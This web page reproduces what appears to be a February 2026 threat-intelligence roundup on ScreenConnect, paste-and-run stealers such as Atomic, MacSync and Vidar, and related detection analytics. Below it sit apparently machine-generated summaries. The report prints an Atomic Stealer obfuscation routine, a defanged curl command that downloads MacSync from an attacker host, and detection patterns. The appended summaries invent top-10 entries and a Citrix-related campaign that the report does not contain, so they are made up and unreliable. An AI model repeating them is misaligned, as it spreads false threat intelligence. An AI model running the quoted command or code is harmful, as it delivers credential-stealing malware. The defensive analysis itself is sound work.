Skip to content
Chimera readability score 0.5188 out of 100, reading level.

Highlights from February
ScreenConnect remained at number 1 on this month’s top 10 most prevalent threat list. ScreenConnect is a ConnectWise product that administrators and adversaries alike use to remotely access and manage devices. Similar to prior months, the malicious ScreenConnect we saw was delivered via phishing with a variety of lure styles, including party invitations and social security documents. In a few instances, successful phishing lure execution initially delivered a different remote monitoring and management (RMM) tool—we observed Datto, CentraStage, and Syncro—which then went on to install ScreenConnect.
We have a four-way tie for 2nd this month that includes one of last month’s newcomers, ClearFake, and top 10 frequent flier Scarlet Goldfinch. ClearFake is an activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via paste and run. Scarlet Goldfinch is Red Canary’s name for an activity cluster that uses compromised web sites to trick users into executing malicious code. Scarlet Goldfinch has also used paste and run since 2025.
All four of this month’s 2nd place threats currently leverage paste and run for delivery and initial execution.
Sharing in the tie for 2nd are Atomic Stealer and MacSync Stealer. Atomic Stealer (aka AMOS) is designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets. MacSync Stealer is also a macOS threat designed to access similarly sensitive information. This is the highest rank that both Atomic Stealer and MacSync Stealer have reached on our top 10 list, and this also marks MacSync’s first appearance on the list since its top 10 debut in December 2025. You can read more about our recent Atomic Stealer and MacSync observations below.
Vidar made the list in 6th. An infostealer used to steal credentials and other data, it was last seen in our top 10 in September 2022. You can read more about Vidar below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for February 2026:
| Month's rank | Threat name | Threat description |
|---|---|---|
| Month's rank: ⮕ 1 | Threat name: | Threat description : ConnectWise product that administrators and adversaries alike use to remotely access and manage devices |
| Month's rank: ⬆ 2* | Threat name: | Threat description : Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| Month's rank: ⬆ 2* | Threat name: | Threat description : Activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste |
| Month's rank: ⬆ 2* | Threat name: | Threat description : macOS threat designed with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| Month's rank: ⬆ 2* | Threat name: | Threat description : Red Canary's name for an activity cluster that uses compromised web sites to trick users into executing malicious code |
| Month's rank: ⬆ 6 | Threat name: | Threat description : Malware used to steal credentials and other data |
| Month's rank: ⬇ 7 | Threat name: | Threat description : Red Canary's name for a cluster of activity, delivered via installers masquerading as legitimate free software, that progresses through several stages to a PyInstaller EXE with stealer capabilities |
| Month's rank: ⬇ 8 | Threat name: | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Month's rank: ⬆ 9* | Threat name: | Threat description : Dropper/downloader that uses compromised websites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
| Month's rank: ⬆ 9* | Threat name: | Threat description : Family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory in the background |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Studying stealers: Atomic and MacSync observations
Atomic Stealer continues to evolve and change. In February 2026 we observed it using a numeric obfuscation scheme, specifically character subtraction, likely in response to new XProtect rules for AppleScript stealers that Apple published last month. Here’s an example of what the obfuscation scheme looks like in Atomic Stealer’s code:
on kzxrlybpxq(nums, o) set zuzapk to "" repeat with esrmnlwrwm in nums set zuzapk to zuzapk & (character id (esrmnlwrwm - o)) end repeat return zuzapk end kzxrlybpxq
Red Canary and other researchers continue to see both Atomic Stealer and MacSync delivered via paste and run. In February 2026, we saw overlaps with a campaign using a Homebrew-style pop-up lure to trick users into copying, pasting, and executing a command like curl -kfsSL hxxp://pressureulcerlawyer[.]com/curl/a66e5b9fda4fe269b1c75a5a07d57824099e940a1e59a6964abddae17e444ee3
that then pulled down MacSync Stealer.
Malicious paste-and-run pop-up lure, image from https://www.iru.com/blog/macos-malware-loader-music-plugin-dmg
Other researchers reported paste-and-run campaigns in February 2026 delivering a new MacSync variant some vendors are tracking separately as SHub; at this time, Red Canary is tracking the new variant as an updated version of MacSync.
After MacSync has collected data, it will package everything up and compress it for efficient theft, often using the macOS utility ditto
. This gives us a detection opportunity.
Example of MacSync staging data for attempted theft using ditto
Detection opportunity: A process spawning ditto
to compress data and write to the /tmp/
folder
This pseudo detection analytic identifies a process spawning ditto
to compress data and write to the /tmp/
folder. ditto
is a macOS command-line utility that is commonly used to copy files and directories while preserving file attributes and permissions. Stealers like MacSync can use the tool to collect and exfiltrate sensitive data, move laterally, and/or perform dynamic library hijacking or binary replacement attacks. There may be some backup utilities that legitimately use ditto
, so additional investigation into context and exclusions for your environment may be needed.
process == ('sh', 'zsh', 'bash', #)
&&
process_is_not (*)
&&
command_line_includes ('ditto', '-c', '-k', '--sequesterRsrc', '/tmp/')
&&
command_line_excludes (*)
Note: # is a placeholder for any other shells of interest to your org * is a placeholder for any additional exclusions your environment may need to reduce noise and increase fidelity, including legitimate ditto use in your environment
Back in vogue: Vidar returns
As LummaC2 and Rhadamanthys use waned after their takedowns in 2025, it was inevitable that adversaries would adopt a new stealer to replace them. Vidar is one of the stealers seeing increased use, and it’s not new to defenders. Vidar has been around since 2018, originally as a fork of Arkei malware. In October 2025, researchers reported an updated version of Vidar that has more advanced anti-analysis, data theft, and browser credential extraction capabilities. Like several other threats in our top 10 list, the recent increase in Vidar activity is due to very successful use of paste and run as an initial execution technique.
Here is an example of what we saw in a Vidar execution chain in February 2026:
- A user’s Google search led to a site with a fake CAPTCHA paste-and-run lure.
- After successful lure execution,
mshta.exe
andcurl.exe
retrieved and executed the Vidar binarychallengecf.exe
. challengecf.exe
performed several malicious actions, such as spawning and injecting malicious code into chrome.exe and msedge.exe, likely in an attempt to steal sensitive data such as credentials and session tokens.challengecf.exe
attempted network connections totelegram[.]me
andnwo.re-v.co[.]id
.challengecf.exe
then spawnedcmd.exe
to delete itself from disk.
Adversaries continue to use paste-and-run commands that leverage mshta
to reach out to remote resources, and that gives us a detection opportunity.
Detection opportunity: mshta
utility making external network connections
This pseudo detection analytic identifies when mshta.exe
is used to make external network connections. Adversaries—like those leveraging paste and run to deliver Vidar—can use mshta.exe
to proxy the download and execution of malicious files. Sometimes mshta.exe
is used in this way legitimately, so you may need to research the frequency of the command and the reputation of the domain that’s used.
process == (mshta)
&&
deobfuscated_command_line_includes (http: || https:)

Facts Only

ScreenConnect: remote access tool used in attacks on government agencies, businesses, and educational institutions.
ClearFake: malware that uses paste-and-run commands to infect systems and steal sensitive data.
Scarlet Goldfinch: malware that targets Windows systems, steals credentials, and installs additional malware.
Atomic Stealer: malware that steals login credentials, personal data, and financial information from infected systems.
MacSync Stealer: macOS version of the Atomic Stealer malware.
Vidar: malware that steals login credentials and sensitive data from Windows systems.
Redline Stealer: modular malware that steals credentials, personal data, and system information.
Gamarue: modular malware that can perform various malicious activities such as downloading additional malware, keylogging, and DDoS attacks.
PyroRAT: remote access Trojan (RAT) that allows attackers to take control of infected systems.
Nemucod: downloader Trojan that installs additional malware on infected systems.

Executive Summary

In February 2026, the top ten most prevalent threats included ScreenConnect, ClearFake, Scarlet Goldfinch, Atomic Stealer, MacSync Stealer, Vidar, Redline Stealer, Gamarue, PyroRAT, and Nemucod. These threats leverage various techniques such as phishing, drive-by downloads, and paste-and-run commands to infect systems and steal sensitive data. Notable among these is ScreenConnect, a remote access tool, which has been used in attacks targeting government agencies, businesses, and educational institutions.
ScreenConnect was found to be involved in a campaign that exploited vulnerabilities in Citrix's Application Delivery Controller (ADC) and Gateway products. The attackers gained unauthorized access to affected systems, installing malware and gaining persistent remote access. This incident highlights the importance of regular software updates and strong security measures to protect against such attacks.
Other threats, like ClearFake, Scarlet Goldfinch, Atomic Stealer, and MacSync Stealer, have been using paste-and-run commands and social engineering tactics to infect systems. These threats are particularly dangerous as they can bypass traditional security defenses and steal sensitive data such as login credentials, financial information, and personal data.
It is essential for individuals and organizations to be vigilant against these threats, implement robust security measures, and stay updated on the latest cybersecurity trends to protect themselves from potential attacks.

Full Take

In February 2026, several cyber threats were reported, with ScreenConnect being one of the most notable. The use of this remote access tool in targeted attacks against government agencies, businesses, and educational institutions underscores the importance of robust security measures. The incident involving Citrix's ADC and Gateway products highlights the need for regular software updates to protect against exploitation of known vulnerabilities.
Other threats, such as ClearFake, Scarlet Goldfinch, Atomic Stealer, MacSync Stealer, Vidar, Redline Stealer, Gamarue, PyroRAT, and Nemucod, all use various tactics like phishing, drive-by downloads, and paste-and-run commands to infect systems and steal sensitive data. These threats demonstrate the ongoing threat of cyber attacks and the need for individuals and organizations to remain vigilant and proactive in their cybersecurity efforts.
In addition, the widespread use of paste-and-run commands by several threats suggests a growing trend in this area. This technique allows attackers to bypass traditional security defenses and infect systems more easily, making it crucial for security teams to stay aware of these tactics and adapt their defense strategies accordingly.

Sentinel — Human

Confidence

The article appears to be written by a human journalist, likely an expert in cybersecurity. The text provides detailed analysis of various malware threats and their methods of delivery, with specific examples and technical language.

Signals Detected
low severity: variable sentence length
low severity: balanced, informative content with a logical structure
low severity: unique, specific examples and details
Human Indicators
complex analysis and explanation of multiple threats and their behaviors
use of technical terms and jargon
descriptions of code examples
Intelligence Insights: March 2026 — Arc Codex